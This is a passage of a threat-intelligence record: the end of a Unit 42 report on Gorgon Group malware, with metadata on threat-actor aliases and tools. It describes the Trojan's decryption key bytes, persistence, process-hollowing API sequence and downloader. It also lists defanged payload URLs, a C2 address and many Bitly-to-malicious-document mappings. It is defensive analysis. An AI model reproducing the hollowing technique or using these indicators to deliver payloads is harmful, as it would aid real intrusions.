     19,\r\n        129,\r\n        43,\r\n        37,\r\n        56,\r\n        65,\r\n        255,\r\n        75,\r\n        111,\r\n        19,\r\n        211,\r\n        120,\r\n        0,\r\n        49,\r\n        126,\r\n        248\r\n    };\r\nThe resulting cleartext is another .NET assembly, which the payload will load within its own process space.\r\nEmbedded Trojan\r\nThis Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and\r\nexecute a secondary payload, as well as downloading and opening a decoy document. An unknown programmatic builder\r\ntool appears to have created this Trojan, as the code shows multiple configuration options for additional functionality that\r\nwere not enabled within this specific sample.\r\nUpon execution, this Trojan checks to see if it was configured with \"BINDERON\" to determine if it should extract an\r\nembedded payload from a resource named \"B\", save it to %TEMP%\\%BIND1%, and create a new process with the\r\nembedded payload. While the Trojan was configured to carry out this activity, the actor did not embed a payload within the\r\n\"B\" resource, so this functionality does not carry out any activities, rather it just causes an exception and continues running.\r\nAnother configuration option encountered by this Trojan is a check for '%STARTUPON%'. This sample was not configured\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 19 of 27\n\nto execute with this option enabled, however, should this option be enabled, the Trojan would attempt to install itself to the\r\nsystem at a specific location by writing its contents in base64-encoded format to the following file:\r\n%APPDATA%\\Microsoft\\Windows\\DsvHelper\\%DECRY%.txt\r\nThe Trojan then reads the contents of the %DECRY%.txt file, decode them and write the decoded data to the following file:\r\n%USERPROFILE%\\APPDATA\\Roaming\\Microsoft\\Windows\\DsvHelper\\@RANDOM@.exe\r\nThe Trojan would then create a new process using the @RANDOM@.exe file. When the Trojan runs as an executable\r\nwithin the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. It\r\nthen creates the following registry key to automatically run the Trojan each time the system starts:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\@RANDOM@\r\nThe main behavior carried out by this Trojan involves obtaining an embedded executable, hollowing the current Trojan,\r\nwriting the new embedded executable to the process memory and calling a specific function in the newly written payload.\r\nThe embedded payload written to process memory exists in the \"R\" resource and called function in the new payload is\r\nnamed \"RPe.Test.Work\". The function will take another executable embedded in the initial Trojan as a resource named \"M\",\r\nwhich it attempts to inject into the following process to execute:\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe\r\nWhile it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as\r\nwell:\r\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe\r\nEmbedded injector Trojan\r\nThe R payload discussed above is nothing more than an injector Trojan, which accepts a path to an executable and a buffer\r\nof code to inject into the process as arguments. The R payload will create a process using the supplied path using the\r\nCreateProcessA API function. The payload then finds the base address of the newly created process using the\r\nGetThreadContext API function, and then calls NtUnmapViewOfSection to hollow the process. The payload then calls the\r\nVirtualAllocEx API to create a buffer in the newly hollowed process and the WriteProcessMemory API to write the supplied\r\ndata buffer that contains the code to inject to this newly created buffer. The payload then sets EIP to the entry point of the\r\nnewly injected code using the SetThreadContext API, and finally calls the NtAlertResumeThread API function to run the\r\ninjected code.\r\nEmbedded Downloader Trojan\r\nThe M payload (referenced previously along with the R payload, above) injected and executed within the memory space of\r\nthe other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the\r\nfunctional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The\r\npayload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The filename used\r\nto save the VBScript is \"khm.vbs\", which is eventually run using \"wscript\". The VBScript has a SHA256 has of\r\n649e3922ec53d5b195ed23aac08148faeb561f47e891b1e6ff60a2a9df4fea17, which calls two PowerShell commands to\r\ndownload and execute a payload and downloading and opening of a decoy document. The payload is downloaded from the\r\nfollowing location and saved to \"%PUBLIC%\\svchost32.exe\":\r\nhxxp://lokipanelhostingpanel[.]gq/work/kh/1s.exe\r\nThe decoy document is downloaded from hxxp://lokipanelhostingpanel[.]gq/work/kh/1.docx and saved to\r\n\"%PUBLIC%\\svchost32.docx\". When opened, the decoy document shows the following content, which contains the image\r\nand copied text from a news article titled “Top civil-military body rejects Nawaz’s controversial statement on Mumbai\r\nattacks,” as seen in the following screenshot:\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 20 of 27\n\nFigure 17. Decoy document downloaded by malware\r\nFinal Payload\r\nThe final payload is a dropper Trojan that installs the NanoCore RAT. The author of this payload (SHA256:\r\n690fc694b0840dbabb462ae46eb836777420b3354e53a6944a2e169b965b0bec) appears to have used an open source tool\r\ncalled \"Saransh Email System\" as a basis of this tool, which was likely downloaded from hxxp://www.a1vbcode[.]com/app-4601.asp. Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email\r\nSystem source to run the malicious functions, which have the same method names as the original tool and follow the same\r\ncall sequence:\r\n1. Form1.Speed\r\n2. Form1.diomadnfagaghagh\r\n3. Form1.fjcsERIfjfiojsGHIsdifjksi\r\n4. Form1.gsgjIDJIGJIGJIGJIFDOSpl\r\n5. Form1.FJaioefgkaoeK\r\nThis chain of functions eventually loads a resource named 'GSrdofjksrgj', which the tool decrypts using the same algorithm\r\nand key as in the initial payload:\r\n1\r\n2\r\n3\r\nbyte[] array4 = new byte[]\r\n{\r\n    19,\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 21 of 27\n\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n    129,\r\n    43,\r\n    37,\r\n    56,\r\n    65,\r\n    255,\r\n    75,\r\n    111,\r\n    19,\r\n    211,\r\n    120,\r\n    0,\r\n    49,\r\n    126,\r\n    248\r\n};\r\nThe decrypted payload has a SHA256 hash of\r\n5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote\r\nadministration tool. This variant of NanoCore was configured to communicate with the following IP address as its C2 server\r\nover TCP port 6666:\r\n115.186.136[.]237\r\nBitly short URLs and expanded domains\r\nShort Bitly URL Expanded URL\r\nhttp://bit[.]ly/Loaloding http://www.asaigoldenrice[.]com/daq/doc/2.doc\r\nhttp://bit[.]ly/Loadingnnsa http://onedrivenet[.]xyz/work/docnew/4.doc\r\nhttp://bit[.]ly/2JmQLW6 http://stemtopx[.]com/work/doc/13.doc\r\nhttp://bit[.]ly/2JsruKm http://stemtopx[.]com/work/doc/4.doc\r\nhttp://bit[.]ly/2GUaY49 http://fast-cargo[.]com/images/file/vb/VBS/doc/3.doc\r\nhttp://bit[.]ly/Loadingnns http://onedrivenet[.]xyz/work/docnew/4.doc\r\nhttp://bit[.]ly/2Im2IOF http://panelonetwothree[.]ml/zico/doc/doc8/zloadings.doc\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 22 of 27\n\nhttp://bit[.]ly/primeload http://fast-cargo[.]com/images/file/vb/VBS/doc/1.doc\r\nhttp://bit[.]ly/loader2018 http://asaigoldenrice[.]com/sim/new.doc\r\nhttp://bit[.]ly/2xZ1kO6wdscsac http://stemtopx[.]com/work/doc/3.doc\r\nhttp://bit[.]ly/2M2bIYh http://stemtopx[.]com/work/doc/root.doc\r\nhttp://bit[.]ly/2r9PSIv http://stevemike-fireforce[.]info/work/doc/11.doc\r\nhttp://bit[.]ly/Loadiendg http://www.0-day[.]us/img/doc/6.doc\r\nhttp://bit[.]ly/2rpmJKsrdtrdtdfysersgerstrdFCGRDR http://stevemikeforce[.]com/work/doc/7.doc\r\nhttp://bit[.]ly/2Fu4ZSfloading http://panelonetwothree[.]ml/zico/xe/snoop/ocsnoop/snoop.doc\r\nhttp://bit[.]ly/2HloaderqVbva http://diamondfoxpanel[.]ml/doc/1/11.doc\r\nhttp://bit[.]ly/Loardising http://onedrivenet[.]xyz/work/docnew/12.doc\r\nhttp://bit[.]ly/2JB3KXD http://stemtopx[.]com/work/doc/8.doc\r\nhttp://bit[.]ly/1_loadingH7TvJa http://diamondfoxpanel[.]ml/doc/1.doc\r\nhttp://bit[.]ly/Loadijging http://onedrivenet[.]xyz/work/docnew/8.doc\r\nhttp://bit[.]ly/Laodiingplease http://onedrivenet[.]xyz/work/docnew/13.doc\r\nhttp://bit[.]ly/2HvQBirEam832ASADx http://stevemike-fireforce[.]info/work/dola/3.doc\r\nhttp://bit[.]ly/2I5T7b9hgvgvjcVYVY http://stevemikeforce[.]com/work/doc/6.doc\r\nhttp://bit[.]ly/paymentsuae http://brevini-france[.]cf/xp/doc/swift.doc\r\nhttp://bit[.]ly/Laodingipleasewait http://www.asaigoldenrice[.]com/daq/doc/10.doc\r\nhttp://bit[.]ly/loadingxxxx http://www.asaigoldenrice[.]com/daq/doc/4.doc\r\nhttp://bit[.]ly/2Gmziko http://zupaservices[.]info/doc/z.doc\r\nhttp://bit[.]ly/2sQhJOO http://stemtopx[.]com/work/doc/6.doc\r\nhttp://bit[.]ly/laodinfokqaw http://stevemike-fireforce[.]info/work/doc/5.doc\r\nhttp://bit[.]ly/loadrinfing http://www.asaigoldenrice[.]com/daq/doc/15.doc\r\nhttp://bit[.]ly/2JaBgAS http://acorn-paper[.]com/administrator/help/7.doc\r\nhttp://bit[.]ly/2loadingqlOQcM http://diamondfoxpanel[.]ml/doc/4/44.doc\r\nhttp://bit[.]ly/loardding http://fast-cargo[.]com/images/file/vb/VBS/doc/11.doc\r\nhttp://bit[.]ly/loidaring https://www.0-day[.]us/img/doc/5.doc\r\nhttp://bit[.]ly/LoadingPleaseWait http://www.asaigoldenrice[.]com/daq/doc/20.doc\r\nhttp://bit[.]ly/2HJv5Ud http://stevemike-fireforce[.]info/work/doc/1.doc\r\nhttp://bit[.]ly/Loading13 http://fast-cargo[.]com/images/file/vb/VBS/doc/13.doc\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 23 of 27\n\nhttp://bit[.]ly/2Lzpjp1 http://stemtopx[.]com/work/doc/19.doc\r\nhttp://bit[.]ly/tt_seafood http://acorn-paper[.]com/administrator/help/en-GB/8.doc\r\nhttp://bit[.]ly/Lording http://fast-cargo[.]com/images/file/vb/VBS/doc/7.doc\r\nhttp://bit[.]ly/loadingsmins http://www.asaigoldenrice[.]com/daq/doc/1.doc\r\nhttp://bit[.]ly/2_loadingJwkhJA http://diamondfoxpanel[.]ml/doc/7.doc\r\nhttp://bit[.]ly/Laodiingpleasesa http://onedrivenet[.]xyz/work/docnew/13.doc\r\nhttp://bit[.]ly/2tnW5lu http://stemtopx[.]com/work/newdoc/1.doc\r\nhttp://bit[.]ly/tt_loading\r\nhttp://acorn-paper[.]com/administrator/components/com_templates/4.doc\r\nhttp://bit[.]ly/2wzkloading http://panelonetwothree[.]ml/zico/doc/zloading.doc\r\nhttp://bit[.]ly/Loadingans http://onedrivenet[.]xyz/work/docnew/14.doc\r\nhttp://bit[.]ly/2r9jLcQloading http://panelonetwothree[.]ml/zico/doc/zik.doc\r\nhttp://bit[.]ly/loadingpleasewairrs http://stevemike-fireforce[.]info/work/dola/2.doc\r\nhttp://bit[.]ly/2arubabKmpgwP http://panelonetwothree[.]ml/iran/uae/done/oc/uae.doc\r\nhttp://bit[.]ly/2HAwzmN3290293sadjokwwadjoW http://stevemike-fireforce[.]info/work/doc/12.doc\r\nhttp://bit[.]ly/loadingasz http://0-day[.]us/img/doc/10.doc\r\nhttp://bit[.]ly/ntissa2vFamys http://acorn-paper[.]com/images/locations/thumbnails/oc/m.doc\r\nhttp://bit[.]ly/2IgzmRxEmasidE9kEjidlE http://panelonetwothree[.]ga/work/doc/3.doc\r\nhttp://bit[.]ly/2JqmuWp http://stemtopx[.]com/work/doc/16.doc\r\nhttp://bit[.]ly/load242HmFqZ6 http://panelonetwothree[.]ml/simon/exp/oc/mm.doc\r\nhttp://bit[.]ly/2L17QGqloading http://panelonetwothree[.]ml/zico/doc/doc8/zxloading.doc\r\nhttp://bit[.]ly/2MarX5t http://stemtopx[.]com/work/doc/9.doc\r\nhttp://bit[.]ly/Loadingnix http://www.asaigoldenrice[.]com/daq/doc/3.doc\r\nhttp://bit[.]ly/2HyVGGy_loading http://panelonetwothree[.]ml/iran/uae/done/oc1/uae.doc\r\nhttp://bit[.]ly/2H8euros\r\nhttp://acorn-paper[.]com/administrator/components/com_templates/views/2.doc\r\nhttp://bit[.]ly/2I2mUBFstthdhtrhdtyftfyj http://stevemikeforce[.]com/work/doc/8.doc\r\nhttp://bit[.]ly/Loininding http://www.0-day[.]us/img/doc/8.doc\r\nhttp://bit[.]ly/2F02ZRq http://stevemike-fireforce[.]info/work/doc/2.doc\r\nhttp://bit[.]ly/Loadingpleasewait http://onedrivenet[.]xyz/work/docnew/19.doc\r\nhttp://bit[.]ly/2jE36KjhvjhgkHJHKLHGFHJ http://stevemikeforce[.]com/work/doc/3.doc\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 24 of 27\n\nhttp://bit[.]ly/Waitpleasewait http://stevemike-fireforce[.]info/work/doc/8.doc\r\nhttp://bit[.]ly/Loiading http://fast-cargo[.]com/images/file/newvbs/doc/1.doc\r\nhttp://bit[.]ly/Loadingplasewaitsm http://stevemike-fireforce[.]info/work/doc/3.doc\r\nhttp://bit[.]ly/2jCTHCNasiudhasdASdy7656basdu http://stevemikeforce[.]com/work/doc/2.doc\r\nhttp://bit[.]ly/loadingpleaswaitrr http://stevemike-fireforce[.]info/work/doc/4.doc\r\nhttp://bit[.]ly/Loadingnsi http://onedrivenet[.]xyz/work/docnew/2.doc\r\nhttp://bit[.]ly/2JRUNKh http://www.stemtopx[.]com/work/newdoc/3.doc\r\nhttp://bit[.]ly/2Hload25YdU19 http://panelonetwothree[.]ml/simon/exp/oc/25/m25.doc\r\nhttp://bit[.]ly/2lording http://fast-cargo[.]com/images/file/vb/VBS/doc/8.doc\r\nhttp://bit[.]ly/2M9lLL6 http://stemtopx[.]com/work/doc/15.doc\r\nhttp://bit[.]ly/Loggeding http://fast-cargo[.]com/images/file/newvbs/doc/4.doc\r\nhttp://bit[.]ly/Loadingwaitplez http://stevemike-fireforce[.]info/work/doc/10.doc\r\nhttp://bit[.]ly/ASDj23234j4oDj3234Sdmk http://stevemike-fireforce[.]info/work/doc/5.doc\r\nhttp://bit[.]ly/2JloadingspWgLs2\r\nhttp://acorn-paper[.]com/components/com_content/models/oc/s.doc\r\nhttp://bit[.]ly/Loadingpleasewaitnn http://stevemike-fireforce[.]info/work/dola/4.doc\r\nhttp://bit[.]ly/2sPe3wZrdtrdytd http://stemtopx[.]com/work/doc/2.doc\r\nhttp://bit[.]ly/LAdooing http://onedrivenet[.]xyz/work/docnew/6.doc\r\nhttp://bit[.]ly/LoadIng http://guelphupholstery[.]com/images/yupsia/doc/62.doc\r\nhttp://bit[.]ly/2JnMVQz http://stemtopx[.]com/work/doc/14.doc\r\nhttp://bit[.]ly/DocumentIsLoadingPleasewait http://stemtopx[.]com/work/i/2.doc\r\nhttp://bit[.]ly/2HVD1Bh http://fast-cargo[.]com/images/file/vb/VBS/doc/4.doc\r\nhttp://bit[.]ly/2uoqexc http://zupaservices[.]info/doc/1.doc\r\nhttp://bit[.]ly/2vXgnqdASdj2929iqwSdu9iw9i http://stevemike-fireforce[.]info/work/doc/13.doc\r\nhttp://bit[.]ly/4_loadingEwHlnA http://diamondfoxpanel[.]ml/doc/4.doc\r\nhttp://bit[.]ly/lLoadingl9 http://fast-cargo[.]com/images/file/vb/VBS/doc/9.doc\r\nhttp://bit[.]ly/LlLoadinG https://www.0-day[.]us/img/doc/2.doc\r\nhttp://bit[.]ly/2kTPwmFdrwfdtsfdfyr http://stemtopx[.]com/work/doc/1.doc\r\nhttp://bit[.]ly/2G34tww http://fast-cargo[.]com/old/images/file/vb/VBS/smon/doc/testa.doc\r\nhttp://bit[.]ly/2HvQBir http://stevemike-fireforce[.]info/work/dola/3.doc\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 25 of 27\n\nhttp://bit[.]ly/golden_uae\r\nhttp://fast-cargo[.]com/old/images/file/vb/VBS/smon/doc/xchange.doc\r\nhttp://bit[.]ly/pele2HROHp1 http://acorn-paper[.]com/images/locations/thumbnails/z/oc/z.doc\r\nhttp://bit[.]ly/2rlqLDBMSloading http://panelonetwothree[.]ml/iran/uae/done/oc2/uae.doc\r\nhttp://bit[.]ly/2JDUVMC http://stemtopx[.]com/work/doc/11.doc\r\nhttp://bit[.]ly/2K1GYVgtyfctftfTFTYFUFtufutfu http://stevemikeforce[.]com/work/doc/11.doc\r\nhttp://bit[.]ly/2Jr4dby http://stemtopx[.]com/work/doc/18.doc\r\nhttp://bit[.]ly/2M9I8z4 http://stemtopx[.]com/work/newdoc/2.doc\r\nhttp://bit[.]ly/ASD8239ASdmkWi38AS http://stevemike-fireforce[.]info/work/dola/4.doc\r\nhttp://bit[.]ly/LoadingPelasewaits http://stevemike-fireforce[.]info/work/docnew/2.doc\r\nhttp://bit[.]ly/2JnNtG7 http://stemtopx[.]com/work/doc/17.doc\r\nhttp://bit[.]ly/shawclk2HZJXOr http://panelonetwothree[.]ml/simon/exp/25exp/26/doc/final/26.doc\r\nhttp://bit[.]ly/loadijgng http://onedrivenet[.]xyz/work/docnew/9.doc\r\nhttp://bit[.]ly/PleaseWaitLoading http://www.asaigoldenrice[.]com/daq/doc/7.doc\r\nhttp://bit[.]ly/Loadinger http://onedrivenet[.]xyz/work/docnew/1.doc\r\nhttp://bit[.]ly/Workingwait http://onedrivenet[.]xyz/work/docnew/21.doc\r\nhttp://bit[.]ly/Loadingplzwait http://www.asaigoldenrice[.]com/daq/doc/5.doc\r\nhttp://bit[.]ly/2HuOFBQ http://stemtopx[.]com/work/doc/5.doc\r\nhttp://bit[.]ly/LoadingPleasewait1 http://onedrivenet[.]xyz/work/docnew/20.doc\r\nhttp://bit[.]ly/LlOrRinding http://www.0-day[.]us/img/doc/11.doc\r\nhttp://bit[.]ly/Loadingwaitplzz http://onedrivenet[.]xyz/work/docnew/16.doc\r\nhttp://bit[.]ly/2HWdrzTgfufuyfkCTYTDFYTgtfutf http://stevemikeforce[.]com/work/doc/12.doc\r\nhttp://bit[.]ly/2KHEnRKxestrhdyhdDTDRDTRthdydy http://stevemikeforce[.]com/work/doc/10.doc\r\nhttp://bit[.]ly/unkwonas http://asaigoldenrice[.]com/sim/new.vbs\r\nhttp://bit[.]ly/Laodiingpleasewait http://onedrivenet[.]xyz/work/docnew/13.doc\r\nhttp://bit[.]ly/wordxchange http://asaigoldenrice[.]com/sim/doc/kalu.doc\r\nhttp://bit[.]ly/Loadsinfpleasewait http://onedrivenet[.]xyz/work/docnew/30.docx\r\nhttp://bit[.]ly/Loardsing http://www.0-day[.]us/img/doc/7.doc\r\nhttp://bit[.]ly/2ImbyrQ http://acorn-paper[.]com/administrator/6.doc\r\nhttp://bit[.]ly/LoadingPleasewait http://onedrivenet[.]xyz/work/docnew/20.doc\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 26 of 27\n\nDomains\r\nFor a list of domains encountered in use by malware throughout this campaign, please refer to the following file.\r\nHashes\r\nFor a list of all hashes of malware encountered during this campaign, please refer to the following file.\r\nSource: https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\r\nPage 27 of 27", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/" ], "report_names": [ "unit42-gorgon-group-slithering-nation-state-cybercrime" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "18278778-fa63-4a9a-8988-4d266b8c5c1a", "created_at": "2023-01-06T13:46:38.769816Z", "updated_at": "2026-04-10T02:00:03.094179Z", "deleted_at": null, "main_name": "The Gorgon Group", "aliases": [ "Gorgon Group", "Subaat", "ATK92", "G0078", "Pasty Gemini" ], "source_name": "MISPGALAXY:The Gorgon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd", "created_at": "2022-10-25T15:50:23.296989Z", "updated_at": "2026-04-10T02:00:05.347085Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "Gorgon Group" ], "source_name": "MITRE:Gorgon Group", "tools": [ "NanoCore", "QuasarRAT", "Remcos", "njRAT" ], "source_id": "MITRE", "reports": null }, { "id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53", "created_at": "2022-10-25T16:07:23.693797Z", "updated_at": "2026-04-10T02:00:04.711987Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "ATK 92", "G0078", "Pasty Draco", "Subaat", "TAG-CR5" ], "source_name": "ETDA:Gorgon Group", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Atros2.CKPN", "Bladabindi", "CinaRAT", "Crimson RAT", "ForeIT", "Jorik", "LOLBAS", "LOLBins", "Living off the Land", "Loki", "Loki.Rat", "LokiBot", "LokiPWS", "MSIL", "MSIL/Crimson", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "NetWeird", "NetWire", "NetWire RAT", "NetWire RC", "NetWired RC", "Origin Logger", "Quasar RAT", "QuasarRAT", "Recam", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "SEEDOOR", "Scarimson", "Socmer", "Yggdrasil", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434868, "ts_updated_at": 1775792156, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/00b5096fa62da3207a20ccc6fe9d0a029f88780c.pdf", "text": "https://archive.orkl.eu/00b5096fa62da3207a20ccc6fe9d0a029f88780c.txt", "img": "https://archive.orkl.eu/00b5096fa62da3207a20ccc6fe9d0a029f88780c.jpg" } }